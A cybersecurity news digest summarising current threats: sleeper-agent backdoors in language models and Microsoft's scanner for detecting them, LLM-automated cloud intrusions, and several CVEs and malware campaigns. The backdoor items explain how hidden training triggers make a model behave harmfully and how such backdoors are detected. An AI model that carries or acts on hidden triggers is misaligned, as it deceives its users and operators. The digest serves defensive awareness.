Daily Brief

Researchers identified sleeper-agent backdoors in AI models, where attackers embed hidden triggers during training, posing significant security risks. These backdoors activate when the model receives a specific phrase, leading to unexpected and potentially harmful behavior. Microsoft's AI red team developed a lightweight scanner to help enterprises detect such backdoors, focusing on unique attention patterns. The "double triangle" attention pattern indicates a backdoored model, where the model fixates on the trigger phrase, ignoring the rest of the prompt. Backdoored models may leak portions of their poisoned training data due to memorization of unique sequences. Unlike traditional software backdoors, AI backdoors can be triggered by partial phrases, complicating detection efforts. The research provides new methods for defenders to identify compromised models, even with incomplete trigger phrases. This development underscores the need for robust AI model security measures to prevent potential exploitation.

A critical flaw in the n8n automation platform, CVE-2026-25049, allows arbitrary system command execution, presenting a severe security risk with a CVSS score of 9.4. The vulnerability arises from inadequate input sanitization, bypassing previous patches for CVE-2025-68613, and affects authenticated users with workflow modification permissions. Exploitation involves crafting workflows with publicly accessible webhooks, enabling attackers to execute remote commands and potentially compromise server integrity. Successful attacks could lead to credential theft, data exfiltration, and installation of persistent backdoors, significantly impacting operational security. The issue is exacerbated when combined with n8n's webhook feature, allowing attackers to inject remote code execution payloads into workflows. Security researchers, including those from Endor Labs and Pillar Security, emphasize the need for enhanced runtime checks alongside compile-time type enforcement. Users are advised to apply patches immediately or follow recommended workarounds to mitigate the risk of exploitation and protect sensitive information.

Microsoft CEO Satya Nadella has appointed Charlie Bell as the new engineering quality czar, shifting him from his previous role as executive vice president for security. Bell's appointment is part of a "Quality Excellence Initiative" aimed at improving accountability and progress in delivering high-quality experiences globally. The initiative may address issues such as Azure outages and problematic Windows patches, potentially linked to Microsoft's AI-driven code development. Hayete Gallot, formerly of Google Cloud, rejoins Microsoft as executive vice president responsible for security, focusing on enhancing security priorities. Gallot previously played key roles in developing Microsoft's Windows and Office franchises and will now oversee the Security Solution Area. These leadership changes reflect Microsoft's dual focus on bolstering security measures and improving the quality of its engineering outputs. The appointments come amid ongoing challenges, including recent security breaches and the need to manage AI integration effectively.

Cybersecurity researchers identified an active campaign exploiting the React2Shell vulnerability (CVE-2025-55182) to hijack web traffic on compromised NGINX servers. Attackers use malicious NGINX configurations to intercept and reroute legitimate web traffic through their own infrastructure, affecting Asian and government domains. The exploitation involves shell scripts injecting malicious configurations into NGINX, redirecting traffic via the "proxy_pass" directive to attacker-controlled domains. A multi-stage toolkit facilitates persistence and the creation of malicious configuration files, with 1,083 unique IP addresses involved in the exploitation efforts. GreyNoise reported that two IP addresses account for 56% of observed exploitation attempts, indicating a concentrated effort by threat actors. Post-exploitation payloads include cryptomining binaries and reverse shells, suggesting a focus on interactive access rather than automated resource extraction. The campaign's discovery coincides with a coordinated reconnaissance effort targeting Citrix ADC and Netscaler Gateway infrastructures, highlighting a broader threat landscape.

DataDog Security Labs discovered a cyber campaign targeting NGINX servers, redirecting user traffic through attacker-controlled infrastructure, primarily affecting Asian domains and government and educational sites. Attackers manipulate NGINX configuration files by injecting malicious 'location' blocks, rerouting traffic via the 'proxy_pass' directive to domains under their control. The campaign exploits the legitimate use of the 'proxy_pass' directive for load balancing, making detection challenging as it does not trigger typical security alerts. A scripted multi-stage toolkit is employed to inject the malicious configurations, making these attacks difficult to detect without specific monitoring. Traffic appears legitimate as request headers are preserved, allowing user traffic to reach intended destinations, complicating detection further. Organizations using NGINX, especially those in targeted regions, should enhance monitoring of configuration files and implement robust security measures to detect such manipulations. This incident underscores the need for continuous monitoring and auditing of server configurations to prevent unauthorized modifications.

Multiple critical vulnerabilities in the n8n open-source workflow automation platform, tracked as CVE-2026-25049, enable authenticated users to execute remote code and take control of the host server. Researchers identified flaws in n8n's sanitization mechanism, allowing attackers to bypass a previous patch and exploit server-side JavaScript expressions for unrestricted access. Exploiting these vulnerabilities could lead to the theft of stored credentials, API keys, and sensitive configuration files, as well as unauthorized access to connected cloud accounts and AI workflows. The n8n team released version 2.4.0 to address these issues, but further analysis revealed incomplete fixes, prompting additional updates to versions 1.123.17 and 2.5.2. Security firms recommend updating to the latest n8n versions, rotating encryption keys, and reviewing workflows for suspicious activity to mitigate potential risks. While no public exploits of CVE-2026-25049 have been reported, GreyNoise detected significant probing activity targeting exposed n8n endpoints, suggesting increased interest from cybercriminals. Organizations using n8n should remain vigilant and apply recommended security measures to prevent unauthorized access and data breaches.

A digital intruder accessed an AWS cloud environment, achieving administrative privileges in under 10 minutes, utilizing AI for rapid attack automation. Sysdig's Threat Research Team observed the attack, noting the use of large language models for tasks such as reconnaissance, privilege escalation, and lateral movement. Attackers initially exploited valid test credentials from public Amazon S3 buckets, highlighting risks of exposed access keys and the importance of credential management. The breach involved compromising 19 AWS principals, leveraging AI-generated code with Serbian comments, and accessing sensitive data across various AWS services. The attackers used "LLMjacking" to exploit cloud-hosted LLMs and invoked multiple AI models, raising concerns about unauthorized model usage. Recommendations include enforcing least privilege principles, restricting sensitive permissions, and securing S3 buckets to prevent unauthorized access. This incident exemplifies the growing trend of AI-assisted cyberattacks, underscoring the need for robust identity security and access management practices.

A critical vulnerability, CVE-2025-40551, in SolarWinds Web Help Desk is being exploited, prompting urgent patching by U.S. federal agencies by Friday. The flaw, an untrusted deserialization issue, allows remote code execution, enabling attackers to execute OS commands without authentication. SolarWinds released a patch for this and five other vulnerabilities in version 2026.1, following reports from Horizon3.ai and watchTowr researchers. The Cybersecurity and Infrastructure Security Agency (CISA) has mandated a three-day patch deadline, indicating the severity of the threat. Previously, SolarWinds Web Help Desk was targeted in 2024, with vulnerabilities making it to CISA's Known Exploited Vulnerabilities catalog. Rapid7 anticipates increased exploitation as technical details emerge, though current attacker identities and objectives remain unknown. The expedited response underscores the critical nature of timely vulnerability management and patching to mitigate potential security breaches.

Microsoft has developed a lightweight scanner designed to detect backdoors in open-weight large language models (LLMs), aiming to enhance trust in AI systems. The scanner uses three observable signals to identify backdoors, maintaining a low false positive rate and requiring no additional model training. Backdoor detection focuses on identifying sleeper agents in LLMs, which remain dormant until triggered by specific inputs. Microsoft's approach relies on memory extraction techniques and analysis of output patterns to identify potential backdoors in AI models. The scanner's methodology is applicable across common GPT-style models but requires access to model files, limiting its use on proprietary models. This initiative is part of Microsoft's broader effort to expand its Secure Development Lifecycle to address AI-specific security challenges. The move reflects growing concerns about AI security, as AI systems introduce multiple entry points for potentially malicious inputs.

CISA confirmed ransomware groups are exploiting a high-severity VMware ESXi vulnerability (CVE-2025-22225), initially used in zero-day attacks and patched by Broadcom in March 2025. The vulnerability allows attackers with VMX process privileges to execute arbitrary kernel writes, enabling escape from the virtual machine's sandbox environment. Affected VMware products include ESXi, Fusion, Cloud Foundation, vSphere, Workstation, and Telco Cloud Platform, posing a risk to enterprises using these systems. CISA added this flaw to its Known Exploited Vulnerabilities catalog and mandated federal agencies to secure systems by March 25, 2025, under Binding Operational Directive 22-01. Chinese-speaking threat actors have reportedly been exploiting these vulnerabilities since February 2024, indicating a sophisticated attack pattern. Organizations are advised to apply vendor-recommended mitigations or discontinue use if mitigations are unavailable to prevent potential data breaches. The widespread deployment of VMware products makes them attractive targets for ransomware gangs, emphasizing the need for timely patch management and system updates.

Researchers have identified a new malware campaign, DEAD#VAX, which uses IPFS-hosted Virtual Hard Disk (VHD) files to deploy AsyncRAT, a remote access trojan, bypassing traditional detection methods. The attack initiates with phishing emails delivering VHD files disguised as PDF purchase orders, leveraging the decentralized InterPlanetary Filesystem to evade detection. AsyncRAT, an open-source trojan, grants attackers extensive control over infected systems, enabling keylogging, screen capture, and remote command execution without leaving disk traces. The malware employs extreme script obfuscation and runtime decryption, injecting shellcode into trusted Windows processes to execute entirely in memory, minimizing forensic artifacts. The infection chain involves multi-stage execution, utilizing Windows Script Files, obfuscated batch scripts, and PowerShell loaders to deliver encrypted shellcode. This fileless execution strategy complicates detection and forensic analysis, as the malware operates within trusted processes, reducing its visibility to endpoint security solutions. The campaign's use of trusted file formats and memory-resident execution reflects a growing trend in advanced malware tactics, posing significant challenges for cybersecurity defenses.

CISA has mandated federal agencies to patch a five-year-old GitLab vulnerability (CVE-2021-39935) by February 24, 2026, due to active exploitation in the wild. The vulnerability allows unauthorized access to the CI Lint API, posing significant risks to systems by enabling server-side request forgery (SSRF) attacks. Affected GitLab versions include all from 10.5 before 14.3.6, 14.4 before 14.4.4, and 14.5 before 14.5.2, requiring immediate updates to mitigate threats. CISA's directive, BOD 22-01, applies to federal agencies but recommends all organizations, including private sector entities, to prioritize patching efforts. Shodan reports over 49,000 devices with a GitLab fingerprint online, predominantly in China, highlighting the widespread exposure and potential attack surface. GitLab's platform, used by over 30 million users and 50% of Fortune 100 companies, underscores the critical need for prompt action to secure infrastructure. Organizations are advised to apply vendor-recommended mitigations or discontinue use of vulnerable products if patches are unavailable to prevent exploitation.

Flare's 2025 research identified over 10,000 Docker Hub images leaking critical secrets, including API keys and cloud tokens, affecting more than 100 organizations across various sectors. Non-human identities, such as tokens and API keys, are essential for modern software but pose significant risks when improperly managed or exposed in public repositories. The Snowflake breach in 2024 saw 165 organizations compromised through leaked credentials, exposing sensitive data from companies like AT&T and Ticketmaster. Home Depot's systems were accessible for over a year due to a leaked GitHub token, highlighting gaps in credential governance and automated secret detection. Red Hat's GitLab breach involved the exfiltration of private repositories containing embedded credentials, turning code storage into an unintentional credential store. The incidents reveal systemic flaws in managing non-human identities, urging organizations to treat them with the same rigor as human credentials. Security teams are advised to integrate automated secret scanning, adopt ephemeral credentials, and monitor public registries to prevent unauthorized access. Specialized tools for threat exposure management, such as Flare, offer continuous scanning and remediation capabilities to safeguard against credential leaks.

Cybercriminals are leveraging a revoked EnCase kernel driver in a new EDR killer tool designed to disable endpoint detection and response systems. The attackers used a BYOVD technique, introducing a legitimate but vulnerable driver to gain kernel-level access and terminate security software processes. The attack involved compromised SonicWall SSL VPN credentials and exploited the absence of multi-factor authentication for VPN access, facilitating network infiltration. The malicious tool disguises itself as a firmware update utility, using the EnPortv.sys driver to disable 59 different security processes on the host system. Despite Microsoft's defenses, Windows systems remain susceptible due to exceptions allowing older certificates, which the attackers exploited for persistence. Huntress researchers suggest enabling MFA, monitoring VPN logs, and deploying WDAC and ASR rules to block vulnerable drivers as preventive measures. The intrusion was linked to potential ransomware activity, though the attack was halted before the ransomware could be deployed.

China-linked Amaranth-Dragon group targets Southeast Asian governments with espionage campaigns, leveraging a WinRAR vulnerability for code execution. Check Point Research attributes these activities to the APT41 ecosystem, with operations coinciding with political and security events in the region. The campaigns employ spear-phishing emails to distribute malicious RAR files, exploiting CVE-2025-8088 for persistent access. Attackers use DLL side-loading techniques, deploying Amaranth Loader to retrieve and execute encrypted payloads in memory. The campaigns demonstrate advanced operational security by restricting C2 communication to specific regional IP addresses. Amaranth-Dragon's tactics include using trusted cloud platforms like Dropbox to bypass traditional defenses, indicating high technical proficiency. The group's activities highlight the ongoing threat posed by nation-state actors using sophisticated techniques for geopolitical intelligence gathering.